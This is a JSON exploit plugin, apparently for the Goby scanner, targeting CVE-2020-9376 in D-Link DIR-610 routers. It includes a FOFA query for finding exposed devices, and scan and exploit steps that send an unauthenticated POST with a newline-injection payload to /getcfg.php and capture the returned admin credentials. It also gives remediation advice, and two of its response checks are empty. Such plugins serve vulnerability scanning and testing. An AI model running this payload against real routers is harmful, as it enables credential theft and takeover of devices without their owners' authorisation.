{ "Name": "D-Link Dump Credentials (CVE-2020-9376)", "Description": "** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.", "Product": "D-Link-DIR-610", "Homepage": "https://www.dlink.com.br/produto/dir-610/", "DisclosureDate": "2020-07-09", "Author": "itardc@163.com", "FofaQuery": "title=\"D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME\" && (body=\"DIR-610\" || server=\"DIR-610\")", "GobyQuery": "", "Level": "2", "Impact": "A POST to /getcfg.php that carries no login can return the DEVICE.ACCOUNT configuration section, which holds the router's account credentials. Anyone who can reach the web management interface can therefore obtain the administrator login and gain administrative access to the router.", "Recommendation": "The DIR-610 is no longer supported by the vendor, so a firmware fix should not be assumed; plan to replace the device with a supported model. Until then, keep the web management interface unreachable from the WAN and other untrusted networks, and change any passwords that may already have been disclosed, including the same passwords reused elsewhere.", "References": [ "https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f", "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182", "https://www.dlink.com.br/produto/dir-610/", "https://nvd.nist.gov/vuln/detail/CVE-2020-9376", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376" ], "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "data": "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1", "data_type": "text", "follow_redirect": true, "method": "POST", "header": { "Content-Type": "application/x-www-form-urlencoded" }, "uri": "/getcfg.php" }, "ResponseTest": { "checks": [ { "bz": "", "operation": "==", "type": "item", "value": "200", "variable": "$code" }, { "bz": "", "operation": "contains", "type": "item", "value": "Admin", "variable": "$body" }, { "bz": "", "operation": "contains", "type": "item", "value": "", "variable": "$body" }, { "bz": "", "operation": "contains", "type": "item", "value": "", "variable": "$body" } ], "operation": "AND", "type": "group" } } ], "ExploitSteps": [ "AND", { "Request": { "data": "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1", "data_type": "text", "follow_redirect": true, "method": "POST", "header": { "Content-Type": "application/x-www-form-urlencoded" }, "uri": "/getcfg.php" }, 
"SetVariable": [ "output|lastbody" ] } ], "Tags": ["infoleak"], "CVEIDs": [ "CVE-2020-9376" ], "CVSSScore": "7.5", "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": ["D-Link-DIR-610"] } }